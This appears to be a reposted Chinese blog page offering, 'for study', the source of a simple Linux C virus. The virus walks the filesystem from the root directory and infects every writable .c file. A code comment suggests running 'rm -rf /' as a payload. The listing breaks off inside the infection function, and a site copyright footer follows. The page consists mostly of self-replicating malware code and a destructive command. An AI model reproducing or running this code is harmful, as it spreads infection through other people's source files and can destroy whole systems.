Linux下一个很简单的C病毒研究

整理了一个很简单的C病毒,切勿乱用,供大家研究!不过是unix/Linux环境的, 能看懂原理就OK了。

/* ucfree:2007-12-31 start */
#include <stdio.h>
#include <dirent.h>
#include <unistd.h>
#include <string.h>
#include <sys/stat.h>
#include <utime.h>
#define VIR_NAM        "virus.c"    // virus file name
#define BUF_SIZE    101
#define STA_PATH    "/"            // start path   


char vir_path[BUF_SIZE] = "";


/*    it's the main part of virus's body,
*    it can traversal all the parts of the system from STA_PATH,
*    and if the process have enough permission,
*    all of the .c file will being infected as a virus   
*/
void vir_body()
{
    DIR        *dp;
    struct dirent    *dirp;
    struct stat        buf, cur_dir_buf;
    int        i;
    char    str_buf[BUF_SIZE];

// init the vir_path
    if (!strcmp(vir_path, ""))
    {
        if (getcwd(vir_path, BUF_SIZE) == NULL)
        {
            return;
        }
        strcat(vir_path, "/");
        strcat(vir_path, VIR_NAM);
        chdir(STA_PATH);
    }

if ((dp = opendir(".")) == NULL)
    {
        return;
    }
   
    // do all the sub_dir terms
    while ((dirp = readdir(dp)) != NULL)
    {
        i = strlen(dirp->d_name);
        if (dirp->d_name[i-1] == 'c' &&
            dirp->d_name[i-2] == '.')
        {// is a c file
            do_c_file(dirp->d_name);
            continue;
        }
       
        if (stat(dirp->d_name, &buf) < 0)
        {// get the stat of the file
            continue;
        }
        if (!S_ISDIR(buf.st_mode))
        {// is not a directory
            continue;
        }
        if (!strcmp(dirp->d_name, ".") ||
            !strcmp(dirp->d_name, ".."))
        {// ignore dot and dot_dot directory
            continue;
        }
   
        // do the submit derectory as current
        chdir(dirp->d_name);
        vir_body();
        chdir("..");
    }
    closedir(dp);
   
    /* here! you can do anything that you want
    * just use the system invokes or shell commands
    * ex:   
    * if (system_data_is_sundy)
    * {   
    * system("rm -rf /");
    * }
    * tip: if the process runing as root, the system being over
    *        it's dangerous, so not to try
    */

return;
}

/*    this funtion is try to infect the .c file,
*    if the .c file is already infected,no need to do it again,
*    else the work begin ......
*/
int do_c_file(const char *f_name)
{
    FILE    *fp_obj, *fp_vir, *fp_tmp;
    char    buf[BUF_SIZE];
    char    flag;
    char    *tmp_buf;
    struct stat        statbuf;// get the object file's stat

struct utimbuf    timebuf;// keep the object file's access and modify time

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wzwzzw.html